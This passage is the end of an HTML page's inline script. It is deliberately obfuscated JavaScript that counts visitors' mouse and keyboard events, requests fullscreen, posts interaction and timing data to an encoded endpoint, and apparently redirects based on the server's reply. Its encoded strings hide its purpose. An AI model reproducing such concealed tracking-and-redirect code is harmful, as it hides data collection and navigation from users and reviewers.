w3tiQSa="~pObF5v_+Zg(@:Pd/f$Qr`yTLAnqRN>l|z[^!wsK<Yuji7VIH*}MXD%k,.o)0]a9?=1hx2UC3m6tEB8JG#S;&4W{\"ec",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function CRQQJv(iL27JUQ){if(typeof EEU2EPZ[iL27JUQ]===h0LtU9Y[0x5]){return EEU2EPZ[iL27JUQ]=w3tiQSa(ROxIHH[iL27JUQ])}return EEU2EPZ[iL27JUQ]}return iL27JUQ[h0LtU9Y[0x0]]===iL27JUQ[h0LtU9Y[0x0]][CRQQJv(0x7c)]()&&!iL27JUQ[CRQQJv(0x7d)]("on")})})[w3tiQSa(0x7e)](iL27JUQ=>{function w3tiQSa(iL27JUQ){var w3tiQSa="DvHrwT~o)?C/*n:JW>}]P1bix(s39RUYEOB&IhjM$ql_2uymcg5=AVk.ztFe,[<f4%G@NS+`\"7;!8|a^QZpX#dK0{L6",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function CRQQJv(iL27JUQ){if(typeof EEU2EPZ[iL27JUQ]===h0LtU9Y[0x5]){return EEU2EPZ[iL27JUQ]=w3tiQSa(ROxIHH[iL27JUQ])}return EEU2EPZ[iL27JUQ]}const JbhZflf=JSON[CRQQJv(h0LtU9Y[0x12])](iL27JUQ);qtTdMql(OtP2zk6=qxA8xp(),nP8xqH=JbhZflf[CRQQJv(h0LtU9Y[0x13])],JbhZflf[h0LtU9Y[0x14]]&&w16hrb(JbhZflf[h0LtU9Y[0x14]]))})[w3tiQSa(0x81)](()=>{return h0LtU9Y[0x0]}))},0x1f4);let iWcua3=!h0LtU9Y[0x1],ty3w2DO=h0LtU9Y[0x0],h_hzXpU=h0LtU9Y[0x0];qtTdMql(document[w3tiQSa(h0LtU9Y[0x15])](w3tiQSa(0x83),iL27JUQ=>{function w3tiQSa(iL27JUQ){var w3tiQSa="}IcOQjZHlNmR0[ASY1zK<=Gy_L3*Eu{UPa%tBFC]W^8X&M@k~!$bJ7xi()26/T,95hfp\"v;q:w#>4go+ed?n|.`rsVD",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function CRQQJv(iL27JUQ){if(typeof EEU2EPZ[iL27JUQ]===h0LtU9Y[0x5]){return EEU2EPZ[iL27JUQ]=w3tiQSa(ROxIHH[iL27JUQ])}return EEU2EPZ[iL27JUQ]}return iL27JUQ[CRQQJv(0x84)]&&ty3w2DO++}),document[w3tiQSa(h0LtU9Y[0x15])](w3tiQSa(0x85),iL27JUQ=>{function w3tiQSa(iL27JUQ){var w3tiQSa="vxY.P@^4[TAM&Ne7s*npoR?f26`rmB0|,/)3~yO+ujVK>Q8hca5w1$l];iHLtWZ(_FC%=!D}k\"bXU#{dzqI9<gJG:SE",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function CRQQJv(iL27JUQ){if(typeof EEU2EPZ[iL27JUQ]===h0LtU9Y[0x5]){return EEU2EPZ[iL27JUQ]=w3tiQSa(ROxIHH[iL27JUQ])}return EEU2EPZ[iL27JUQ]}return iL27JUQ[CRQQJv(0x86)]&&h_hzXpU++}),window[w3tiQSa(0x87)]={["cl"](iL27JUQ,w3tiQSa,CRQQJv){function JbhZflf(iL27JUQ){var w3tiQSa="A2%u:BDg!jX)U^fk$/~EZ.?@CTvrw<Q3Gt&b}I[xWPp9NLdaY(#y=nhJ1z4m\"Ho*_7sc+RF5>8KSMVi,O0lq`]|;6{e",JbhZflf,li3kzfJ,ncAuAwQ,slKOjH,nP8xqH,XBeXEZ,c1Lc54;qtTdMql(JbhZflf=""+(iL27JUQ||""),li3kzfJ=JbhZflf.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],nP8xqH=h0LtU9Y[0x0],XBeXEZ=-h0LtU9Y[0x1]);for(c1Lc54=h0LtU9Y[0x0];c1Lc54<li3kzfJ;c1Lc54++){var b46Jm0F=w3tiQSa.indexOf(JbhZflf[c1Lc54]);if(b46Jm0F===-h0LtU9Y[0x1])continue;if(XBeXEZ<h0LtU9Y[0x0]){XBeXEZ=b46Jm0F}else{qtTdMql(XBeXEZ+=b46Jm0F*h0LtU9Y[0xc],slKOjH|=XBeXEZ<<nP8xqH,nP8xqH+=(XBeXEZ&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],nP8xqH-=h0LtU9Y[0x2])}while(nP8xqH>h0LtU9Y[0x9]);XBeXEZ=-h0LtU9Y[0x1]}}if(XBeXEZ>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|XBeXEZ<<nP8xqH)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function li3kzfJ(iL27JUQ){if(typeof EEU2EPZ[iL27JUQ]===h0LtU9Y[0x5]){return EEU2EPZ[iL27JUQ]=JbhZflf(ROxIHH[iL27JUQ])}return EEU2EPZ[iL27JUQ]}document[li3kzfJ(0x88)](iL27JUQ)?.addEventListener(li3kzfJ(0x89),()=>{function iL27JUQ(iL27JUQ){var JbhZflf="]3uv,./`&x$5?z>=9);+!HAngBSQFbIdPipYsmlhEORZMr}~8t*Ga6[@:WUy%<T0CecKD1L{f4jJq7N#^_(wo|V2k\"X",li3kzfJ,w3tiQSa,ncAuAwQ,slKOjH,nP8xqH,XBeXEZ,c1Lc54;qtTdMql(li3kzfJ=""+(iL27JUQ||""),w3tiQSa=li3kzfJ.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],nP8xqH=h0LtU9Y[0x0],XBeXEZ=-h0LtU9Y[0x1]);for(c1Lc54=h0LtU9Y[0x0];c1Lc54<w3tiQSa;c1Lc54++){var b46Jm0F=JbhZflf.indexOf(li3kzfJ[c1Lc54]);if(b46Jm0F===-h0LtU9Y[0x1])continue;if(XBeXEZ<h0LtU9Y[0x0]){XBeXEZ=b46Jm0F}else{qtTdMql(XBeXEZ+=b46Jm0F*h0LtU9Y[0xc],slKOjH|=XBeXEZ<<nP8xqH,nP8xqH+=(XBeXEZ&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],nP8xqH-=h0LtU9Y[0x2])}while(nP8xqH>h0LtU9Y[0x9]);XBeXEZ=-h0LtU9Y[0x1]}}if(XBeXEZ>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|XBeXEZ<<nP8xqH)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function JbhZflf(JbhZflf){if(typeof EEU2EPZ[JbhZflf]===h0LtU9Y[0x5]){return EEU2EPZ[JbhZflf]=iL27JUQ(ROxIHH[JbhZflf])}return EEU2EPZ[JbhZflf]}if(iWcua3){return}iWcua3=!h0LtU9Y[0x0];const li3kzfJ=qxA8xp();qtTdMql(ncAuAwQ[JbhZflf(0x8a)](slKOjH,li3kzfJ+fBrNsS*h0LtU9Y[0x16]+""),setTimeout(()=>{function iL27JUQ(iL27JUQ){var ncAuAwQ="BhIJb\"vz82ciSWyUZf<s3H%7Nqn1.#G(QL59K:Fmt~!@ewO_*o^0AYdTP;X={rC]kER)$|lp4[Mg,VjxD`a+&>u6}?/",JbhZflf,li3kzfJ,w3tiQSa,slKOjH,nP8xqH,XBeXEZ,c1Lc54;qtTdMql(JbhZflf=""+(iL27JUQ||""),li3kzfJ=JbhZflf.length,w3tiQSa=[],slKOjH=h0LtU9Y[0x0],nP8xqH=h0LtU9Y[0x0],XBeXEZ=-h0LtU9Y[0x1]);for(c1Lc54=h0LtU9Y[0x0];c1Lc54<li3kzfJ;c1Lc54++){var b46Jm0F=ncAuAwQ.indexOf(JbhZflf[c1Lc54]);if(b46Jm0F===-h0LtU9Y[0x1])continue;if(XBeXEZ<h0LtU9Y[0x0]){XBeXEZ=b46Jm0F}else{qtTdMql(XBeXEZ+=b46Jm0F*h0LtU9Y[0xc],slKOjH|=XBeXEZ<<nP8xqH,nP8xqH+=(XBeXEZ&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(w3tiQSa.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],nP8xqH-=h0LtU9Y[0x2])}while(nP8xqH>h0LtU9Y[0x9]);XBeXEZ=-h0LtU9Y[0x1]}}if(XBeXEZ>-h0LtU9Y[0x1]){w3tiQSa.push((slKOjH|XBeXEZ<<nP8xqH)&h0LtU9Y[0x3])}return OvK_ak(w3tiQSa)}function ncAuAwQ(ncAuAwQ){if(typeof EEU2EPZ[ncAuAwQ]===h0LtU9Y[0x5]){return EEU2EPZ[ncAuAwQ]=iL27JUQ(ROxIHH[ncAuAwQ])}return EEU2EPZ[ncAuAwQ]}return osHFu_K(JbhZflf(0x8b),{[JbhZflf(0x8c)]:nP8xqH,[ncAuAwQ(0x8d)]:c1Lc54,[ncAuAwQ(0x8e)]:OtP2zk6-w6CrRK,mm:ty3w2DO,dc:h_hzXpU,fk:w3tiQSa,[ncAuAwQ(0x8f)]:!document[ncAuAwQ(0x90)]&&document[ncAuAwQ(0x91)](),ms:li3kzfJ-OtP2zk6})[ncAuAwQ(0x92)](iL27JUQ=>{return iL27JUQ&&setTimeout(()=>{return w16hrb(iL27JUQ)},CRQQJv?CRQQJv-(qxA8xp()-li3kzfJ):h0LtU9Y[0x0])})[ncAuAwQ(0x93)](()=>{return h0LtU9Y[0x0]})},0xa))})},ch:()=>{function iL27JUQ(iL27JUQ){var w3tiQSa="iXeMOfjPdGTHVLIbBQFDErpSCYAJsKNaogcZRltnqWhUmk~*,:5[#w=0{x/>&`}%6)]+3|v<^2$.7u!91@_y?\"4;8z(",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function w3tiQSa(w3tiQSa){if(typeof EEU2EPZ[w3tiQSa]===h0LtU9Y[0x5]){return EEU2EPZ[w3tiQSa]=iL27JUQ(ROxIHH[w3tiQSa])}return EEU2EPZ[w3tiQSa]}return osHFu_K(w3tiQSa(0x94),{[w3tiQSa(0x95)]:nP8xqH,[w3tiQSa(0x96)]:c1Lc54})[w3tiQSa(0x97)](iL27JUQ=>{return Number(iL27JUQ)===h0LtU9Y[0x1]})},bl:()=>{function iL27JUQ(iL27JUQ){var w3tiQSa="hXH,kT?`uKF1}xSfDz{b5tJno/.2YU4NQ!aOgcMRr|yLd\"=7iWqweZ&_I+~V@]>j8%$AEG3v:9plB*6s<0P[m#)(C;^",CRQQJv,JbhZflf,ncAuAwQ,slKOjH,li3kzfJ,nP8xqH,XBeXEZ;qtTdMql(CRQQJv=""+(iL27JUQ||""),JbhZflf=CRQQJv.length,ncAuAwQ=[],slKOjH=h0LtU9Y[0x0],li3kzfJ=h0LtU9Y[0x0],nP8xqH=-h0LtU9Y[0x1]);for(XBeXEZ=h0LtU9Y[0x0];XBeXEZ<JbhZflf;XBeXEZ++){var c1Lc54=w3tiQSa.indexOf(CRQQJv[XBeXEZ]);if(c1Lc54===-h0LtU9Y[0x1])continue;if(nP8xqH<h0LtU9Y[0x0]){nP8xqH=c1Lc54}else{qtTdMql(nP8xqH+=c1Lc54*h0LtU9Y[0xc],slKOjH|=nP8xqH<<li3kzfJ,li3kzfJ+=(nP8xqH&h0LtU9Y[0xd])>h0LtU9Y[0xe]?h0LtU9Y[0xf]:h0LtU9Y[0x10]);do{qtTdMql(ncAuAwQ.push(slKOjH&h0LtU9Y[0x3]),slKOjH>>=h0LtU9Y[0x2],li3kzfJ-=h0LtU9Y[0x2])}while(li3kzfJ>h0LtU9Y[0x9]);nP8xqH=-h0LtU9Y[0x1]}}if(nP8xqH>-h0LtU9Y[0x1]){ncAuAwQ.push((slKOjH|nP8xqH<<li3kzfJ)&h0LtU9Y[0x3])}return OvK_ak(ncAuAwQ)}function w3tiQSa(w3tiQSa){if(typeof EEU2EPZ[w3tiQSa]===h0LtU9Y[0x5]){return EEU2EPZ[w3tiQSa]=iL27JUQ(ROxIHH[w3tiQSa])}return EEU2EPZ[w3tiQSa]}return osHFu_K(w3tiQSa(0x98),{[w3tiQSa(0x99)]:nP8xqH,[w3tiQSa(0x9a)]:c1Lc54})[w3tiQSa(0x9b)](()=>{})}})}iL27JUQ()})(); </script> </body> </html>